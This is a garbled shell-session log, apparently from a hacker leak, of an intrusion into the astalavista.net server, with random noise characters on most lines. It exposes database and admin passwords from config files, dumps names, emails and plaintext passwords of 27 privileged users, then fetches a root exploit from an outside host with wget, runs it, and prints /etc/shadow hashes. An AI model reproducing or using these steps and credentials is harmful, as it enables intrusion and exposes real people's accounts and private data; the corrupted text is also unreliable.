drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 .., r$ V& ]: p9 C
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007+ i& z7 C5 G* M# a: D/ b' U
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
8 Y: |/ p6 I) adrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com6 d/ x6 @' p; E9 f8 F0 y
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend% n- l. V2 [) Q. g; ~9 q# P
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner! d; j2 |: g9 [! D+ m: T
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
3 g. G1 |$ M+ o; D5 vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
% t. R& L7 J( N0 ^drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
5 i4 g% ~! _& ^( D. U. w" c/ [drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
7 w; H. u p% k-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
, r9 y( X! B( J3 Y" d-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
0 N6 ~: g% C" ~) A% x+ X X; ?drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
7 B) ~; Y0 h9 o% D* B: Xdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour" Y, Z. d. P/ g# P$ T# f/ }
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
7 ~3 ]6 A! Q9 T2 h* N-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess% r# d: c5 n" o2 L9 e/ `" T
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php( u D$ J8 Z8 F& Z( u, I
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html8 X$ o3 y5 D# V* ]9 C) c( Z
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php* D/ V! a; t/ a* {* Z
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
8 h. q% Q& B8 n. V-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
( W" J; g- W; N* B ^! t8 U' Mdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
7 D. m4 f+ }- f1 _: z: P/ S5 mdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
5 g2 S* v3 ]* A* m+ p( Ndrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib9 _4 Y7 F# A0 }$ W4 m4 @
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log. s V# [# ?5 {, {) c F5 S
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member6 ~% R( x; q# b) i5 `, I
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata Q1 i1 S; N, {" V3 o% P
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
- b. L6 \3 G8 f/ `-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf! a* b* {* {6 s/ b) V7 v' J0 |
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re; C F) z* e3 a! N5 Z
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
/ d" n# Z% P! mdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss8 j; m& Y0 \" D5 [- `- f4 R# L
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources! p* {* Y( X+ a5 A4 k& z
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com6 J. l& c* u5 e
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes# @/ v# B9 d7 D2 J# }
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
# m; B/ L- G: c" Zdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
* T3 M1 y) ? S4 Z3 @" y: Ldrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
! n% @4 P: q+ z4 s" X- Ydrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
& t: _3 Z( m1 w3 a7 r-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
, k" [5 ~" y/ Q- B0 S6 X9 Jdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki* b4 ~* n" t* Y# E9 J5 G9 g
4 ]' ~! |7 f/ f) X4 f% R) @sh-3.2$ head -20 index.php: m% i2 d8 q8 U7 D
<?PHP
% Z/ Z1 D2 x1 D# o2 T) s/**$ j9 ]) F0 T! }
* Mainfile (external) for astalavistaNET v2.0
* F W& t% y) r3 j* U*" Z% _* T W+ b8 F& [' c
* @copyright Astalavista IT Engineering GmbH. ~$ h% V0 _0 ^$ r- m) v. k
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>* F( o! I3 v, {/ F* \/ \; g* h
* @version 1.0
: e7 Q' n* x! T4 p*/
$ K( A/ v3 s! ^: V O8 n
* c( ]3 L* ^7 S& v* W5 `& J- c if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
( M$ U% a* k* ~, N, d! f( |" }0 j' l $dontStartSession = false;7 K1 ?( n8 }6 J/ m3 R
} else {
0 _# t3 E9 C4 L I $dontStartSession = true;, u) v9 `# [0 |) A* }
}
" _) w0 T" n6 o2 [$ I1 c! I require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
- j' g# a- K- E$ H require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);0 t& `2 i5 V, F
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);$ K% Z0 p* q6 _/ y8 U
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
) ~$ U0 U8 m; t; _4 K" k, X, N2 B5 J3 j8 l9 H( L
sh-3.2$ cd config4 W4 {: q4 q! |9 m" U* R1 o
sh-3.2$ ls -la* v5 W) `# A$ T: q4 [1 h9 @3 e, Y
total 32
6 y+ s* E5 r) \0 _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .$ @/ l9 S6 ?0 S, H8 c
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
}& ~5 c, a; ]% G% o! H+ P-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php2 m% _2 i* w' G8 E2 k1 [1 }: V3 X; u
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php4 R! T$ E' c; f4 b/ y& ^% j
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php0 ^5 j% v4 F! o, i1 h) c5 i
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
' V0 m5 N! _ m. m7 D-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
( ?2 z' n' j+ U Y3 [' J& T7 ?1 u1 Y! T( F3 r$ J- A6 H8 H
sh-3.2$ cat com.conf.php
1 p' O) N' C( U' U. @2 T[snip]
" J ^" Z) m' h//member-database3 n1 h1 e' n" V; \& F
$_CONFIG['db_mem_server'] = ‘localhost’;' J5 s5 D1 a; I/ u2 B G' w- x
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;* M+ p; u) |! q5 H5 _& s
$_CONFIG['db_mem_user'] = ‘astanet_db’;+ B, [, Q1 B7 x! b: B; j
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
: R5 |- N, A5 V% w* p" f$_CONFIG['db_mem_debug'] = false; //true or false
* t% ^- I. k+ _* |//ads-database
6 q* ^4 E% n! E. x$_CONFIG['db_ads_server'] = ‘localhost’;$ D e% |+ Z; S
$_CONFIG['db_ads_database'] = ‘astanet_ads’;% j4 g8 G' G" t( Q8 t7 D
$_CONFIG['db_ads_user'] = ‘astanet_db’;
4 H; T" i1 M5 D" ~3 l; r' ?$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;: R, N' M+ C; Q9 S* m& v/ d
$_CONFIG['db_ads_debug'] = false; //true or false
) ?5 `& C3 m# v' z//rainbow-database1 a0 W3 Y& T) P/ y" r
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;7 d* h; f" @) [, h2 {
$_CONFIG['db_rainbow_database'] = ‘rainbow’;- ~8 Y' y) R, [5 q
$_CONFIG['db_rainbow_user'] = ‘dinu’; L8 e: c, H; x6 l& X
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
/ F" Z6 l4 I& }$ u' [/ X+ w$_CONFIG['db_rainbow_debug'] = false; //true or false
a [5 Q7 s& s//mailing lists database7 g: s) x* V& J/ V5 D) h0 Z# _
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
+ @# X j3 d( r' ^$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;" z: h. f6 t* T; n
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
1 o4 s \) E, x9 j% y& Y5 Z$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;$ u7 V$ y7 T' h2 L# @1 S' }
$_CONFIG['db_mailing_lists_debug'] = false; //true or false% S* @6 W! n# q, U F7 q
//paypal8 P8 ` r- F T: p
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
+ D- ^/ ? g( a V5 }4 o5 ]$_CONFIG['sub_pp_cmd'] = ‘_xclick’;0 w/ f. V% x) J# h: g
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
7 m& D1 F7 y' |" J" Q$_CONFIG['sub_pp_noship'] = ‘1′;: Q# S3 r- _" @" m) {3 Q
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;2 F O- P! N+ _ N( l: M( M+ T
[snip]' R; H$ X( k) ?
& T, [' [$ ^2 e% X% ?! R7 gsh-3.2$ cd ..( I* N% K/ N4 k- ^7 I& r( |# s6 E5 [# O
sh-3.2$ cd member
* c4 y$ S3 q [) G: jsh-3.2$ ls -la7 Y* D& E% ]! v
total 206 X2 H+ L2 H$ c5 |0 z9 E& [
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .& O% {5 F9 ^: b \2 L
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
' a* V1 ]& q/ h, H6 E' b6 @& B9 ~+ K-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess- r! Y0 u0 F% O9 L, C! H7 H1 T
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
. V3 K/ Z( R. Y" K5 r; b( n& jsh-3.2$ cat .htaccess
! N' F. w, p5 DSecFilterEngine off, V5 _' l3 D# E
- E% h6 L9 L5 h& X$ xsh-3.2$ cd ..7 P* `% Y# e/ b9 _' h% {1 m) ]
sh-3.2$ cd cron
$ w# _- s3 V( h9 O5 `. D2 qsh-3.2$ ls -la5 i: N& U* @0 G5 I: R4 {9 m: A
total 168
# z i3 G7 Q6 c9 K& I& ^drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .4 U+ M0 Q$ H& }6 ]' h& x. D# ]
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
- R* X: b5 j) U* g' E-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
' y/ P/ D6 a3 u) \' `' ~# `-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php9 R1 J, z& g" ?2 w; ?+ @5 K( @
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php5 | N! W1 _ ]! y1 U- y+ X# `
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php: h' ?* I( F: U) W# `& k5 J
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php9 n: n. \" @& y- L9 ~+ T9 a
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php7 C% d Y w _2 K
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
2 n/ V2 _2 Z0 {$ j9 g; w5 [-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
/ z- F, P" m. _/ s e-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
7 w4 @! O6 _) x-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
?* c1 u2 ]1 }& Z2 K-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
9 K3 p: Z# q. T* M0 ?6 `/ S-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
: j( D0 {1 c# w B- e1 \' t/ g-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh+ P1 T+ g) L0 K% y+ }
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php8 d# p' x% w" z* k
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
2 E, g5 V" |3 ^* b# i# }% _% @6 W-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php4 F# h0 g0 ~' g' V
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
. ? @" Z6 q& y! I1 E0 w7 _' \. |-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php; o/ O3 q6 ]9 y7 S) \$ E( Q
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email0 q- V" H; F: t4 g- `
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
2 Z8 u. D. i) C-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php2 ]2 \; C9 i3 _9 ~) ^- B" F
- r; v/ b4 c2 i- n* d
sh-3.2$ cd ..) |" I( x% _0 Y3 g" A
sh-3.2$ cd _007/ B& h2 M* h5 t- W! z
sh-3.2$ ls -la
! Z5 m6 A6 G% @6 Z; }. L& gtotal 24
3 O6 _. z. Y+ s: l+ N% r7 ]+ Pdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .: s) h$ q5 u! l, w- ]0 ]
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
" H6 T8 ]) @$ A6 R( D-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess i* k1 W+ l9 L7 N# Y
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php$ q4 P8 G! |8 p2 S# ?' N% b6 a i+ |) F7 Z
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php1 y# n3 M( D' x" o
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
5 S" A- ?1 j& K& m) x: u% X. z, d; ^; V/ _$ e: j. S
sh-3.2$ cat .htaccess- z" }9 k% r* Z' k( n
authType Basic
: h/ u# ?! O& \( d2 tauthName Admin
) B) z9 {1 s7 V- a) l+ g) `authUserFile /home/astanet/auth/.htadm_pwd9 q5 E2 j: h( o9 D# A: ]
require valid-user! @8 | x3 |' s: T8 Y+ A. c; j
- j3 h* F: S z/ ]sh-3.2$ cat /home/astanet/auth/.htadm_pwd
; [2 ~$ J- a5 G6 vadmin2net:CR0bl65MwhfT
5 A; s% i6 x- m/ t. g& j2 n: v3 v. U
sh-3.2$ mysql -u astanet_db -p: ]) X! U4 t5 V2 X( ~- C% q" L* j
Enter password:8 L K% l: g$ O$ N) n0 j4 K" h
Welcome to the MySQL monitor. Commands end with ; or \g.9 g0 K: T7 f' V3 k. L0 d! G, \
Your MySQL connection id is 2751530 k+ C4 j+ G& M5 j7 K
Server version: 5.0.45-community-log MySQL Community Edition (GPL)$ G# [# s& L0 g5 h; P
. ^3 p9 h' O3 [# SType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
7 G* n z# D; i* c
5 h' b n8 Z; a9 E9 g6 Pmysql> show databases;
l; m9 L* v2 k" k5 R( f. g; p2 k6 d8 Z+———————–+
% x5 P6 A6 m" [; h% y8 \| Database |; N# Q+ @0 M0 z
+———————–+
6 Z+ [, L9 W" e1 Z( r. K| information_schema |
. L) T0 v6 _& ]! R| astanet_ads |+ K7 I: a: {$ t* |
| astanet_mailing_lists |8 ~7 ~; u" x, H4 b" a8 Y. _
| astanet_mediawiki |
2 ^5 t' R1 |5 T2 f| astanet_membersystem |
/ x& {' w( B4 }, Z( |4 j3 `| test |6 ] ^7 ^' |2 k% ~! m
+———————–+
8 G$ J- F5 F% k. s9 M: w h6 rows in set (0.00 sec)
* W5 M2 f1 k2 G5 d. Z$ F- z1 o( N- [7 K+ E
mysql> use astanet_membersystem
0 w6 L% A" t# I& MDatabase changed/ n0 p( i: N& t. L/ D5 b9 ^5 O! _
mysql> show tables;
, P; P# G: p3 A' l8 j+———————————–+1 Y! t9 l v1 I0 H. f1 p- a
| Tables_in_astanet_membersystem |
+ B5 l" ]. @7 v \) H$ B8 G+———————————–+
! v# t1 ? d( c& b| blacklist_categories |
* k8 t+ \3 H5 ]0 e9 e7 p; O| blacklist_content |* a% d6 I8 A, F' f( T' P
| blacklist_levels |% ]0 K) d7 |( ?
| blacklist_mcset |0 q* q6 p: W+ p
| dir_categories |9 |4 S" B4 X# T6 o6 q, p. ]* y# d
| dir_comments |9 }) X6 o: a% @4 {% A# f: R
| dir_links |
. `% p, [- H! R/ c D| dir_temp |
0 w m9 S) v! O3 X+ q$ ?6 A8 i| dir_votes |
% T( R8 [. E! c) q: }2 \| documents |
/ E+ V7 m4 C l! M4 }1 d| documents_categories |
( V8 \3 j; }) ?! F: }% r- ]- s| email_content |! V! w6 D( ?1 E4 q( Z# _
| email_settings |/ W+ A$ g- X7 B. a( e8 e# Y
| exploits |
* _/ i) f0 I2 X- k$ P3 u| exploits_categories |6 r( e3 ]1 k0 S8 C) b: h
| exploittree_categories |, a, h5 x" S9 z, J
| exploittree_exploits |
' G6 K3 h0 A: D( b+ ]2 X6 v| home_values |
4 b0 g. Y5 j: b| iso_countries |
, c! }0 v( m H2 e" g9 J6 w| links_categories |
& Z7 U# A( t U: i( A| links_records |
9 ]* ~1 ?7 l" N( }| links_unauth |" I" s4 j/ j, d
| links_votes |; P: }6 ?! j7 j6 }0 E
| log |
& r( R1 K6 I9 E6 k/ ~| news_categories |
3 A6 _* u7 K; i2 O| news_comments |
4 y, e2 Y8 c' P6 ^1 @/ ]; D! o* A, U| news_emoticons |
6 s6 i; p# X7 x; u| news_latest |) e2 \# M2 i* d2 {: w0 k
| news_messages | C3 B( K7 H# b
| news_statistics | z n4 ^4 o& {4 B
| news_votes |
& T, P( r3 s5 B. L' I5 [# b| prices_content | |: y+ U" ?8 [8 T9 z; L
| prices_offers |# V2 y, u6 O" D0 H4 G
| rss_settings |) m8 k2 r0 N2 y( q3 T; ~
| sessions |
' y8 A0 ^6 O/ m9 \" C9 R| stats_signups |
* C9 L" ? w* @5 ^- x( L. F+ H| u2u2 |9 Y( L3 L; Z6 ?1 b( U4 _; t1 A
| u2u_contact |
; a G7 a- F7 @: T) h# {- C| u2u_settings |& N" w5 H2 `- ^# ~# [! U0 Q( q
| user_keywords_selected_categories |
3 j8 |0 ^, [9 Z" {0 V8 x$ ?$ f! b| users |! m: l2 ~# [" u; I2 g
| users_ipn_test |5 C9 ~$ A3 w. @7 C
| users_keyword_values |1 s/ U) K7 m/ |" E9 H$ q* P
| users_profile |
! Y7 K' v$ p9 N# B* F| users_temp |2 {* j# y0 u0 Z9 |
| users_upgrade |- E# f7 d( G/ p' a/ c! u
+———————————–+8 r* s8 v0 L9 E0 ~* N
46 rows in set (0.00 sec)# z5 H2 f5 K1 p' Y+ Q* ?3 D2 `
% Y7 B; v+ A, Y2 l& Y+ H. Rmysql> describe users;
! J# Z& X4 \0 {6 R' C& `) P E' P+————————–+————————————–+——+—–+———————+—————-+
- P+ Q( S) S7 {| Field | Type | Null | Key | Default | Extra |$ |8 _4 T0 W9 E5 E8 i
+————————–+————————————–+——+—–+———————+—————-+
$ o. j: t" f. d8 {8 n| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
$ K6 V7 X1 K7 Z' U5 R| user | varchar(50) | NO | | | |
3 M. l$ ^0 J0 \$ s* y$ N* `| nickname | varchar(30) | NO | MUL | anonymous | |
4 \6 h1 N' r* @2 d| password | varchar(30) | NO | | | |
6 F2 J; Q9 B5 W$ P/ t| userlevel | tinyint(3) | YES | MUL | NULL | |: K" t8 J& j7 Q* B: o0 @. U1 O
| exp | int(8) unsigned | NO | | 0 | |& H5 C: G: @- m% E/ p1 P
| email | varchar(50) | NO | | | |
" F" @: U0 [/ X4 A' ` n| ip | varchar(15) | NO | | 0 | |1 j7 o! P9 T0 ]/ y' H; g! s
| proxy | set(’0′,’1′) | NO | | 0 | |
# `# P$ I! i9 l, H& d| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
( \+ W: f- e1 t| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
) u% {+ u' m/ `: n/ x0 n| anz_in | tinyint(1) | NO | | -1 | |
; c0 f5 X0 U" O3 E. f| status | tinyint(1) unsigned | NO | | 0 | |
6 e8 ~- Y2 u. u6 h( E| checked | set(’0′,’1′,’2′) | NO | | 0 | |
7 b! ?9 c Q8 X) [" }| freemember | set(’0′,’1′) | NO | | 0 | |. E5 j8 T+ n! ]2 D
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |4 _ |5 P* v3 M: M
| lang | tinytext | NO | | | |
7 b& K1 E, C; R Y, M. b: b! w| adid | smallint(6) | NO | | 0 | |% I% P5 y# s# X4 x' {5 S
| pp_txn_id | varchar(255) | YES | | NULL | |# h1 P5 y' ^7 P' x' [
| cnb_transaction_id | varchar(255) | YES | | NULL | |
% x3 T" j; f/ @/ C; [| cnb_order_id | varchar(255) | YES | | NULL | |
8 w& ^% {3 A/ X9 [! l4 }| cnb_user_id | int(11) | YES | | 0 | |
4 |! c% q& P/ z, U# C: Q5 h+ k2 _8 ~+————————–+————————————–+——+—–+———————+—————-+
$ K8 M, h1 E) J( _ E22 rows in set (0.01 sec)
, Z2 o* o. M x) @" W
9 r7 S/ C- M$ E, u6 @* Pmysql> select count(*) as skids from users;/ p x! R( ^/ A* ]+ M
+——-+
' a" A+ P% B$ ^; }( A3 _| skids |, G, c" A" t/ |
+——-+
1 j8 y' Z5 N# p, P* U' `- ^| 25199 |, D8 d; B! m* |# `
+——-++ P1 v6 t1 L7 b: Q$ e, S
1 row in set (0.00 sec)
! P! i+ i) h1 g7 w- ]" F; `; j0 q$ @# H4 |, l
mysql> select user,nickname,password,email from users where userlevel = 1;
$ }" l$ _3 j) o, K3 g+ @0 b# d+————————–+———————-+——————+———————————–+
6 j1 [% C. h" [, v| user | nickname | password | email |
9 l9 g) V5 @: i2 c7 y+————————–+———————-+——————+———————————–+
& w+ j. B- t( t( L| pascal | prozac | astaman3 | 链接标记info@astalavista.net |+ x" y2 e0 H* G2 o* A. v& m$ f: W
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
& J6 ]9 n, Y' q- ?- H- p7 \3 p( m| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
, [; M: v* y: ] E& w, ?1 ], d| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
0 T1 g3 r0 @( X| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |0 s0 V- Q( d( P& V3 ?
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
) V0 D9 k' w: j7 W, ]% R| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
0 `/ W) W5 n: Y" w2 L| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |& Z' i# f, M' D
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |6 A; u5 l& K/ `+ k
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |0 ]7 v" c: I/ f. @
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |- A S1 q. ]0 \/ F
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |$ J q( q2 e6 T# t0 F4 l! E
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
5 V( r! i1 K, X$ @| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
* h$ R( ?1 C( E" Y' p9 D| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
% u" W# G3 _! g5 W: A7 R| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |8 w' d' k, \4 z4 m! U0 y
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
5 O% `" B, g& h6 B| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
& M# v0 u: s( A1 `% z6 u| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |6 g4 o4 W3 U0 A4 V( C; D
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |" W, K5 b; ~6 u0 ?1 _
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
s7 [; W8 ^& q5 S& {" j| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
( v% Q# j% [' V, S| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |6 r% k* s) `1 `1 {! H' g1 ^
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
( ^5 |. u3 s- k" q| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
+ c2 W; ~% U& p; h3 [5 g1 k! \, K| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
- g% _- V1 B# M+ J" x5 l| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
. v2 v, E2 _ E( h+————————–+———————-+——————+———————————–+
h7 C6 l2 ]( m% ?" e0 o27 rows in set (0.00 sec)( D0 n/ o" k) W- F X) g9 t! g
% _" N# y3 b) N [- Q
mysql> exit;
2 k( w( U6 i7 f1 \ q3 TBye! ]/ t0 N* d4 {4 y7 I: w7 e9 a
7 w9 z6 H: ^% e' f[~] plaintext passwords? yes,
?7 l, d! F8 G% k0 xThose so called “security professionals” who charge you $6.66 / month to
6 W1 X# I9 J5 z" j4 G: t6 a7 z2 ?register at their hack-proof portal, save your passwords in plaintext…, ~2 H3 H% |4 v ~! q' }
brilliant!
+ T- z% c9 O5 r/ D3 k( ^1 }" P2 D" C, P
[~] This been fun but we want more.
; n5 i( J4 q ?
: J/ \/ ~! {5 X4 Qsh-3.2$ uname -a0 ]7 o1 V4 F* l- Y; Z
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
3 e% M& U# X0 C; B) s5 p6 r l# zsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]6 g6 h- u- w8 J0 z) ~3 U6 c9 q
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
* \! Q" t& u, E7 bResolving anti.sec.labs… 13.33.33.37$ O% D/ @8 \2 Q. F" V9 c3 k
Connecting to anti.sec.labs|13.33.33.37|:80… connected." {( t# s( }: l' H4 d; U6 z& a2 k
HTTP request sent, awaiting response… 200 OK- K& m9 |8 t4 ~( j3 X. Z
Length: 18200 (18K) [text/plain]
, C. a7 {9 W& n9 s8 WSaving to: `g0troot’/ x! m' \6 {" P6 ]
6 S6 [( l$ h5 }+ E" h' R8 ~& _. y100%[=========================================================================================================================================>] 18,200 58.6K/s in
5 J; }, N4 ]6 P0.3s9 O$ @% C! _: o2 _- t& g+ h' e
# A2 c7 q! G' Q# B18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]9 o2 p: m N/ d
# s" j7 l$ A" ?! e- H7 N2 o
sh-3.2$ ./g0troot -i x86_64
2 E1 ?. u2 l, c% q) Z; C[+] g0troot - anti.sec.labs
" T0 j6 O( M% W# z6 I! H[+] Target: 2.6.18-128.1.10.el5
% Q) D5 J/ Q& i* B% |4 w[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]& H; U$ C( I n6 u
) V' i$ ~! A) j F. A# X @8 A; B[+] r00tr00t
. c0 ~1 { y; }! O& q" \7 G[~] Executing shell…
: K2 A% z1 p& {! u- x% P) _3 f, m. a0 Q4 i3 F' `
sh-3.2# id
& i2 @3 h6 `8 O, J$ Auid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel), V" }; e+ O4 i) H3 @$ F" r$ n5 {
. B2 n. ~) f8 ]- g% @sh-3.2# cat /etc/shadow w, \: w1 }$ |- z$ ]
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::8 U; f, G' n- t. h7 @, l
[snip]
) q1 p. O. B2 S7 T# A7 Qadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
" D: A/ ^. W2 i0 U* b- Ujon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::' ~( V7 E3 H) k) M) K( j# _5 P, L- s2 U
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
